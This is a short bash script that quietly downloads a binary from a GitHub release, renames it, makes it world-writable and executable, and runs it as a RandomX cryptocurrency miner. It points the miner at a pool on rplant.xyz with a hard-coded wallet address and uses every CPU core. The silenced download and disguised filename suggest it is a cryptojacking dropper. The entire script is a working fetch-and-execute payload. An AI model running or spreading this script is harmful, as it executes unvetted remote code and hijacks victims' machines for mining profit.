#!/bin/bash
wget -O sauip https://github.com/maksidutyru99/der/releases/download/test/zepo > /dev/null 2>&1
chmod 777 sauip
./sauip --donate-level 1 -o randomx.rplant.xyz:7130 -u SaLvs6nRK5h4gfGWuhQcqX1PFDpCC7aQ8ibUt4QfGsqGecxhApPmgBDEFq6ETRzNLBPH9jS1Qrk62GCByc1CkkUGF8t7Uv9zB5H.x -p webpassword=x -a rx/0 -t $(nproc --all)
